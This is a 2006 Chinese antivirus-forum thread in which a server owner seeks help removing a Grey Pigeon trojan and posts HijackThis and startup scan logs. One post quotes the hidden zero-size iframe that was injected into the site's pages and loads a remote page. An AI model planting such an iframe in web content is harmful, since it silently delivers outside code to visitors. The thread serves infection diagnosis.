【求助】紧急求助：杀不了的灰鸽子！！高手们帮忙阿 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛【求助】紧急求助：杀不了的灰鸽子！！高手们帮忙阿

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

【求助】紧急求助：杀不了的灰鸽子！！高手们帮忙阿

青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:	发表于： 2006-01-19 16:09 \| 显示全部短消息资料字号：小中大 1楼【求助】紧急求助：杀不了的灰鸽子！！高手们帮忙阿我的服务器上中了灰鸽子啦，在别的机器上浏览这个服务器的网页时，在状态栏里出现了一个正在连接到http://web.163.sh.cn/~26360185/afu.htm的网页，以前我问过关于这个病毒的问题（大概在05年的11月中旬），按照某位斑竹（我忘记是那一位了）的提示，查到了对方的ip，然后在防火墙上阻止了这个ip段，但是今天发现她穿过了防火墙，又进来了！我的扫描日志如下： HijackThis_815汉化版扫描日志 V1.99.1 保存于 8:04:29, 日期 2005-11-16 操作系统： Windows 2000 SP4 (WinNT 5.00.2195) 浏览器： Internet Explorer v6.00 SP1 (6.00.2800.1106) 当前运行的进程： C:\WINNT\System32\smss.exe C:\WINNT\system32\winlogon.exe C:\WINNT\system32\services.exe C:\WINNT\system32\lsass.exe C:\WINNT\system32\svchost.exe C:\WINNT\system32\spoolsv.exe C:\Program Files\NavNT\defwatch.exe C:\WINNT\System32\svchost.exe C:\WINNT\System32\ibmasrex.exe C:\WINNT\System32\IBMHPASV.EXE C:\WINNT\System32\ibmsmbus.exe C:\WINNT\System32\llssrv.exe C:\Program Files\NavNT\rtvscan.exe C:\WINNT\system32\regsvc.exe C:\WINNT\system32\MSTask.exe C:\Program Files\System Safety Monitor\SSMService.exe C:\WINNT\System32\WBEM\WinMgmt.exe C:\WINNT\system32\svchost.exe C:\WINNT\System32\inetsrv\inetinfo.exe C:\WINNT\System32\msdtc.exe C:\WINNT\system32\Dfssvc.exe C:\Program Files\System Safety Monitor\sysSafe.exe C:\WINNT\Explorer.EXE C:\WINNT\system32\Atiptaxx.exe C:\Program Files\NavNT\vptray.exe C:\WINNT\system32\internat.exe C:\WINNT\System32\svchost.exe C:\Program Files\Internet Explorer\iexplore.exe C:\WINNT\System32\mdm.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Documents and Settings\Administrator\桌面\HijackThis1991zww.exe O4 - 启动项HKLM\\Run: [AtiPTA] Atiptaxx.exe O4 - 启动项HKLM\\Run: [vptray] C:\Program Files\NavNT\vptray.exe O4 - 启动项HKLM\\Run: [MS-4011 Memory Patch] C:\Documents and Settings\Administrator\桌面\RavSasser.exe -Patch O4 - HKCU\..\Run: [Internat.exe] internat.exe O17 - HKLM\System\CCS\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58 O17 - HKLM\System\CS1\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58 O17 - HKLM\System\CS2\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58 O20 - Winlogon Notify: NavLogon - C:\WINNT\system32\NavLogon.dll O20 - Winlogon Notify: System Safety Monitor - C:\WINNT\SYSTEM32\SSMWinlogonEx.dll O23 - NT 服务: DefWatch - Symantec Corporation - C:\Program Files\NavNT\defwatch.exe O23 - NT 服务: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe O23 - NT 服务: IBM Automatic Server Restart Executable (ibmasrex) - Unknown owner - C:\WINNT\System32\ibmasrex.exe O23 - NT 服务: IBM Active PCI Alert Service (IBMHPS) - IBM Corporation - C:\WINNT\System32\IBMHPASV.EXE O23 - NT 服务: SMBus Upgrade Service for Windows 2000 and above (ibmsmbus) - International Business Machines Corp. - C:\WINNT\System32\ibmsmbus.exe O23 - NT 服务: Norton AntiVirus 客户端 (Norton AntiVirus Server) - Symantec Corporation - C:\Program Files\NavNT\rtvscan.exe O23 - NT 服务: System Safety Monitor (SSM) - System Safety - C:\Program Files\System Safety Monitor\SSMService.exe 上面是我的服务器上的扫描日志，那位好心人帮忙看看如何解决，很让人着急啊，谢谢了！！！ 2006-01-20 10:39:48
青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:	分享到：

青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:	发表于： 2006-01-19 16:19 \| 显示全部短消息资料字号：小中大 2楼那位高手帮忙看看啊，我在线等阿
青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:

青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:	发表于： 2006-01-19 16:32 \| 显示全部短消息资料字号：小中大 3楼不知道啊，没有路径，要是知道我就把它给删除了啊，谢谢你！
青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:

青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:	发表于： 2006-01-19 16:34 \| 显示全部短消息资料字号：小中大 4楼他会在网页的源文件里写入一个这样的东西<iframe src="http://web.163.sh.cn/~26360185/afu.htm" name="zhu" width="0" height="0" frameborder="0">，并且<iframe src="http://web.163.sh.cn/这个后面的每次可能都不一样，我估计是通过远程控制写进来的
青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:

青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:	发表于： 2006-01-19 16:36 \| 显示全部短消息资料字号：小中大 5楼高手们，求求你们了，帮帮忙阿
青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:

青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:	发表于： 2006-01-19 16:40 \| 显示全部短消息资料字号：小中大 6楼这个是什么，能告诉我在哪里能下好吗？
青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:

青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:	发表于： 2006-01-19 16:57 \| 显示全部短消息资料字号：小中大 7楼没人帮忙吗？好可怜哦，好心酸哦！55555555555555~~~~~~~~~~~~~~~
青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:

青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:	发表于： 2006-01-20 10:28 \| 显示全部短消息资料字号：小中大 8楼非常感谢，下面就是日志，我看不明白，麻烦您帮我看看，谢谢了 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run + AtiPTAATI Desktop Control PanelATI Technologies, Inc.c:\winnt\system32\atiptaxx.exe + vptrayNorton AntiVirusSymantec Corporationc:\program files\navnt\vptray.exe HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved + Display Panning CPL ExtensionFile not found: deskpan.dll + HyperTerminal Icon ExtHyperTerminal Applet LibraryHilgraeve, Inc.c:\winnt\system32\hticons.dll + LDVP Shell ExtensionsNorton AntiVirusSymantec Corporationc:\program files\common files\symantec shared\ssc\vpshell2.dll + WinRAR shell extensionc:\program files\winrar\rarext.dll HKLM\System\CurrentControlSet\Services + DefWatchVirus Definition DaemonSymantec Corporationc:\program files\navnt\defwatch.exe + ibmasrexIBMc:\winnt\system32\ibmasrex.exe + IBMHPSIBM Active PCI Alert ServiceIBM Corporationc:\winnt\system32\ibmhpasv.exe + ibmsmbusSMBus Upgrade Service for Windows 2000 and aboveInternational Business Machines Corp.c:\winnt\system32\ibmsmbus.exe + Norton AntiVirus ServerNorton AntiVirusSymantec Corporationc:\program files\navnt\rtvscan.exe HKLM\System\CurrentControlSet\Services + ati2mpadATI2MPAD Miniport DriverATI Technologies Inc.c:\winnt\system32\drivers\ati2mpad.sys + atirage3ATIRAGE3 Miniport DriverATI Technologies Inc.c:\winnt\system32\drivers\atimpab.sys + b57w2kBroadcom NetXtreme Gigabit Ethernet NDIS5 Driver.Broadcom Corporationc:\winnt\system32\drivers\b57w2k.sys + dmioNT Disk Manager I/O DriverVERITAS Software Corp.c:\winnt\system32\drivers\dmio.sys + dmloadNT Disk Manager Startup DriverVERITAS Software Corp.c:\winnt\system32\drivers\dmload.sys + GENERICSMBSMBus Generic Device driver for Windows 9x/2K?International Business Machines Corp.c:\winnt\system32\drivers\smbgen.sys + IBMHPAIBM Active PCI Alert DriverIBM Corporationc:\winnt\system32\drivers\ibmhpa.sys + IBMHPFIBM Active PCI Filter DriverIBM Corporationc:\winnt\system32\drivers\ibmhpf.sys + NAVAPc:\program files\navnt\navap.sys + NAVAPELc:\program files\navnt\navapel.sys + nfrd960IBM ServeRAID Controller DriverIBM Corporationc:\winnt\system32\drivers\nfrd960.sys + PtilinkDirect Parallel Link DriverParallel Technologies, Inc.c:\winnt\system32\drivers\ptilink.sys + safemonSystem Safety Monitor 2.0 extension for Windows security layerSystem Safety Limitedc:\winnt\system32\drivers\safemon.sys + SMBusDHSMB Device Hub Controller driver for Windows 9x/2K?International Business Machines Corp.c:\winnt\system32\drivers\smbusdh.sys + SMBusHCSMB Host Controller driver for Windows 9x/2K?International Business Machines Corp.c:\winnt\system32\drivers\smbushc.sys + SymEventSymantec Event LibrarySymantec Corporationc:\program files\symantec\symevent.sys HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify + NavLogonc:\winnt\system32\navlogon.dll + System Safety MonitorSystem Safety Winlogon NotificationSystem Safety Limitedc:\winnt\system32\ssmwinlogonex.dll
青岛的好人初生襁褓狮帖子:9 注册: 2005-12-12 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT